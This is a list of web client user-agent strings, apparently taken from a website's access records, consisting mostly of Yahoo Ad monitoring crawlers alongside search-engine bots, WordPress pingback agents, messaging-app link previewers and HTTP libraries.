+Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1633577522-10 +GuzzleHttp/6.5.5 curl/7.79.1 PHP/8.0.10 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1633568382-10 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1633578918-10 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1633604122-10 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1633618576-10 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1633625841-10 +Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.71 Safari/537.36 MicroAdBot/1.1 (https://www.microad.co.jp/contact/) +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1633572095-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1633573165-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1633580606-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1633608159-0 +GuzzleHttp/6.5.5 curl/7.58.0 PHP/7.2.24-0ubuntu0.18.04.8 +WhatsApp/2.21.21.3 A +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1633623046-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1633565763-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1633565758-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1633577519-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1633577523-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1633601342-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1633601339-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1633615643-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1633615646-0 +Mozilla/5.0 (Linux; Android 4.0.4; Galaxy Nexus Build/IMM76B) AppleWebKit/537.36 (KHTML, like Gecko; Mediapartners-Google) Chrome/94.0.4606.71 Mobile Safari/537.36 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1633565764-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1633577524-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1633601343-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1633615647-0 +Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html),gzip(gfe) +Client/8.3 (org.mozilla.ios.Firefox; build:5826; iOS 10.2.0) Alamofire/4.3.0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1633565760-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1633577521-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1633601340-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1633615644-0 +Google Chrome (Xubuntu Linux) +WordPress/4.9.18; https://www.gooyait.com +Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.81 Safari/537.36 PTST/210930.181447 +Mozilla/5.0 (iPhone; CPU iPhone OS 7_0 like Mac OS X) AppleWebKit/537.51.1 (KHTML, like Gecko) Version/7.0 Mobile/11A465 Safari/9537.53 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm), XFF:40.77.167.12 +Mozilla/5.0 (compatible;contxbot/1.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.71 Safari/537.36 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1633664593-10 +WordPress/5.7.3; https://caphes.ens.fr; verifying pingback from 122.224.65.202 +PHP/7.3.74 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1633655393-20 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1633667499-20 +WordPress/5.3.9; https://manijasarroyo.com +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1633664594-10 +Mozilla/5.0 (compatible; YandexAccessibilityBot/3.0; +http://yandex.com/bots) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.17 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1633655962-10 +rogerbot/1.2 (https://moz.com/help/guides/moz-procedures/what-is-rogerbot, rogerbot-crawler+aardwolf-crawler-42@moz.com) +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1633708003-10 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1633708018-10 +WhatsApp/2.21.5.22 A +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1633733180-10 +Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.81 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html) +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1633657673-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1633670772-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1633683546-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1633693564-0 +WhatsApp/2.21.19.17 A +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1633652046-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1633664590-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1633664595-0 +Mozilla/5.0 (Linux; Android 6.0.1; Moto G (4)) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.81 Mobile Safari/537.36 PTST/210930.181447 +Mozilla/5.0 (en-us) AppleWebKit/537.36(KHTML, like Gecko; Google-Adwords-DisplayAds-WebRender;) Chrome/94.0.4606.71Safari/537.36 +Mozilla/5.0 (Linux; Android 6.0.1; Moto G (4)) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.81 Mobile Safari/537.36 PTST/211008.135020 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1633664596-0 +Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.71 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html),gzip(gfe) +python-urllib3/1.26.7 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1633664592-0 +python-requests/2.7.0 CPython/2.7.17 Linux/4.15.0-154-generic +Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm), XFF:40.77.167.12 +Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.81 Safari/537.36 PTST/211008.135020 +WordPress.com; http://digitaslabsparis.com +WordPress/5.8.1; https://digitaslabsparis.com +WordPress.com; https://digitaslabsparis.com +Mozilla/5.0 (compatible; OrtingoBot/2.0; +https://ortingo.com/ortingobot) [More detail: OrtingoBot is a web crawler for the search engine, Ortingo. If you would like your entire site, or specific parts of your site not to be crawled by our bot, please inquire us at hello@ortingo.com, and we will happily cease the crawling. Note: Version 2.0 of OrtingoBot is a re-engineered version of our older version, 1.0, designed for being more accurately compliant with robots.txt files, or the Robots Exclusion Standard.] +Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) adbeat.com/policy AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1633805908-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1633805907-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1633738558-10 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1633750577-10 +GuzzleHttp/6.5.5 curl/7.64.0 PHP/8.0.11 +PHP/6.3.75 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1633741552-20 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1633753462-20 +Mozilla/5.0 (compatible; YandexAccessibilityBot/3.0; +http://yandex.com/bots) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.92 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1633738559-10 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1633750578-10 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1633741136-10 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1633741181-10 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1633768364-10 +Mozilla/5.0 (Windows NT 10.0; Win64; x64) adbeat.com/policy AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36 +Mozilla/5.0 (Windows NT 10.0; Win64; x64) adbeat.com/policy AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 YaBrowser/21.8.3.614 Yowser/2.5 Safari/537.36 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1633798880-10 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1633744129-0 +WhatsApp/2.21.21.5 A +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1633756820-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1633801766-0 +WhatsApp/2.21.20.15 A +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1633738556-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1633738560-0 +Mozilla/5.0 (Linux; Android 6.0.1; Moto G (4) Build/MPJ24.139-64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4535.3 Mobile Safari/537.36 PTST/200804.150828 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1633750575-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1633750590-0 +yandex/2 +Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; GoogleAdwordsExpress) Chrome/94.0.4606.71 Safari/537.36 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1633738561-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1633750611-0 +WordPress/5.8.1; https://bugsp.ru +UCWEB/2.0 (Java; U; MIDP-2.0; Nokia203/20.37) U2/1.0.0 UCMini/11.1.1.1091 (SpeedMode; Proxy; Android 4.4.4; ALCATEL_ONE_TOUCH_7025D ) U2/1.0.0 Mobile +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1633738558-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1633750577-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1633777545-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1633778517-0 +Google.Drive/2.21.021.04.45 (OS=Android;OSVer=9;Manufacturer=samsung;Model=SM-G892A;SyncEngine=Cello) Mozilla/5.0 (Linux; Android 9; SM-G892A Bui +WordPress/5.8.1; https://python.tutorialink.com +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1633824814-10 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1633835902-10 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1633826992-20 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1633839631-20 +WordPress/5.0.14; http://pk2m.uho.ac.id; verifying pingback from 84.247.50.238 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1633824815-10 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1633835903-10 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1633841129-10 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1633847790-10 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1633829863-0 +Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/610.2 (KHTML, like Gecko) JavaFX/8.0 Safari/610.2 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1633830646-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1633842651-0 +WordPress/5.8.1; https://www.binarytides.com +WhatsApp/2.21.21.6 A +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1633888985-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1633888986-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1633824812-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1633824816-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1633835881-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1633835904-0 +Mozilla/5.0 (Linux; Android 6.0.1; Moto G (4)) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4535.0 Mobile Safari/537.36 PTST/210331.204756 +UCWEB/2.0 (Java; U; MIDP-2.0; Nokia203/20.37) U2/1.0.0 UCMini/11.1.3.1128 (SpeedMode; Proxy; Android 7.0; Micromax_Q4101 ) U2/1.0.0 Mobile +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1633835905-0 +WordPress/5.8.1; https://logiss.ru +UCWEB/2.0 (Java; U; MIDP-2.0; Nokia203/20.37) U2/1.0.0 UCMini/11.4.0.1180 (SpeedMode; Proxy; Android 6.0; SM-N900 ) U2/1.0.0 Mobile +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1633824813-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1633835901-0 +WordPress/5.8; https://jankari24.com +Apache-HttpClient/4.5.3 (Java/11.0.10) GuzzleHttp/6.3.3 curl/7.58.0 PHP/7.3.6-1+ubuntu18.04.1+deb.sury.org+1 LuaSocket 3.0-rc1 Mozilla/5.0 (Linux; Android 11; SM-A715F) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.66 Mobile Safari/537.36 Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.192 Safari/537.36 Mozilla/5.0 (Windows NT 10.0; ) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/82.0.4085.4 Safari/537.36 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3715.122 Safari/537.36 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.92 Safari/537.36 luminati-proxy-manager/1.256.472 python-requests/2.18.4 python-requests/2.23.0 unknown +Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm), XFF:157.55.39.80 +WhatsApp/2.2140.5 N +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1633911151-10 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1633922132-10 +WordPress/5.8.1; https://nachedeu.com +PHP/5.3.55 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1633913776-20 +WordPress/5.8.1; https://rucore.net/p +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1633925040-20 +UCWEB/2.0 (Java; U; MIDP-2.0; Nokia203/20.37) U2/1.0.0 UCMini/11.4.0.1180 (SpeedMode; Proxy; Android 7.1.1; LG-X230 ) U2/1.0.0 Mobile +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1633911152-10 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1633922133-10 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1633928529-10 +Mozilla/5.0 (Windows NT 10.0; Win64; x64) adbeat.com/policy AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1633959439-10 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1633972150-10 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1633979981-10 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1633979978-10 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1633986426-10 +Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Googlebot/2.1; +http://www.google.com/bot.html) Chrome/94.0.4606.81 Safari/537.36 +WordPress/5.8.1; https://meshok-sovetov.ru +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1633916987-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1633927883-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1633934744-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) 